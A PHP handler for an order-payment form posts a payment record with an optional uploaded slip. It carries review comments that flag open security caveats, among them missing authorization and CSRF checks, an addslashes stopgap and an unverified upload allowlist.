
Current File : /home2/cp648411/public_html/simded.com/order_member/ajax_payment.php
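<?php
/**
 * Handles the payment form post for an order.
 *
 * Flow: validate the posted fields, look up the active bank row, optionally
 * store the uploaded file (field "file_sh") through $image_class->file_up(),
 * insert a payment_order row, link it to the orders row, then redirect to
 * index.php. Any failure renders the danger alert instead.
 *
 * Relies on $image_class, $upload, $view_db, $util_class, $actiondata_db and
 * $date, none of which are defined in this file (presumably set up by the
 * included header.php; confirm).
 *
 * NOTE(review): nothing visible here checks that the caller is logged in, that
 * pm_orderid belongs to the caller, or that the request carries a CSRF token.
 * If header.php does not enforce these, any visitor can attach a payment
 * record to any order id.
 */
include('../include72/header.php');

// Keep full error reporting for the logs, but never print errors into the
// response: with display_errors on, a failed query or upload discloses file
// paths and SQL fragments to whoever sent the request.
ini_set('display_errors', '0');
error_reporting(E_ALL);

$folder = 'payment';

// Returns a POST field as a string, or '' when it is missing or was sent as
// an array (e.g. bank_id[]=...), so later string handling cannot be confused.
$postField = static function ($key) {
	return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
};

// Wraps a value in single quotes for the pre-quoted format add_db() is given
// below. addslashes() is a stopgap only: it is not charset-aware and is no
// substitute for bound parameters. The durable fix is for the DB layer to
// accept values separately from SQL text.
$sqlText = static function ($value) {
	return "'" . addslashes((string) $value) . "'";
};

$bankId  = $postField('bank_id');
$orderId = $postField('pm_orderid');
$price   = str_replace(',', '', $postField('price'));
$timeRaw = $postField('time_p');

// Both ids are concatenated into SQL (the WHERE clause below and the unquoted
// orders update), so accept digits only.
// NOTE(review): assumes bank and order ids are numeric, as the MAX(id)+1 logic
// and the unquoted 'id' in the orders update suggest; confirm against the schema.
$inputOk = preg_match('/\A\d+\z/', $bankId) === 1
	&& preg_match('/\A\d+\z/', $orderId) === 1
	&& ($price === '' || preg_match('/\A\d+(\.\d+)?\z/', $price) === 1);

$saved = false;

if ($inputOk) {
	$list_bk = [
		'table' => 'bank',
		'where' => 'status = 1 AND id = "' . $bankId . '"',
	];
	$row_bk = $view_db->q($view_db->view($list_bk));

	// Refuse the payment when the bank id does not match an active bank row.
	if (isset($row_bk['name'])) {
		// Default to '' so the insert never reads an undefined variable when
		// no file was sent.
		$name_img = '';
		if (isset($_FILES['file_sh']['error']) && $_FILES['file_sh']['error'] === UPLOAD_ERR_OK) {
			// NOTE(review): file_up() is not visible here. Confirm it enforces
			// an extension/content allowlist and generates the stored name
			// server-side; an unrestricted upload into a web-served folder
			// lets a client place executable script files on the host.
			$name_img = $image_class->file_up($_FILES['file_sh'], $folder, $upload);
		}

		$time = ($timeRaw !== '') ? $util_class->day_Ymdtime($timeRaw) : '';

		// NOTE(review): MAX(id)+1 is not atomic; two concurrent posts can
		// compute the same id. An auto-increment key would remove the race.
		$list_cm = ['table' => 'payment_order', 'count' => 'MAX(id) AS maxid', 'where' => '1'];
		$row_cm  = $view_db->q($view_db->view($list_cm));
		$maxid   = (int) $row_cm['maxid'] + 1;

		$add = $actiondata_db->add_db([
			'table'      => 'payment_order',
			'id'         => $sqlText($maxid),
			'order_id'   => $sqlText($orderId),
			'bank_id'    => $sqlText($bankId),
			'bank_name'  => $sqlText($row_bk['name']),
			'price'      => $sqlText($price),
			'time'       => $sqlText($time),
			'file'       => $sqlText($name_img),
			'createdate' => $sqlText($date),
			'status'     => '1',
		]);

		if (isset($add['suc']) && $add['suc'] == 1) {
			$edit_db = $actiondata_db->edit_db([
				'table'            => 'orders',
				'id'               => $orderId,
				'payment_order_id' => $maxid,
			]);
			$saved = true;
		}
	}
}

if ($saved) {
	// NOTE(review): header.php runs before this point; if it emits any output
	// and output buffering is off, this redirect cannot be sent. Confirm.
	header("Location: index.php");
	// Stop here so nothing further executes or renders after the redirect.
	exit;
} else {
	?>
	<div class="alert alert-danger" role="alert">
	  <button type="button" class="close" data-dismiss="alert" aria-label="Close" onclick="window.location.href='index.php'">
			<span aria-hidden="true" style="font-family:Verdana, Geneva, sans-serif;">&times;</span>
		</button>
	  <strong>Warning!</strong>  &nbsp;  <span> ระบบมีปัญหากรุณาลองใหม่อีกครั้งค่ะ</span>
	</div>
	<?php
}

?>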
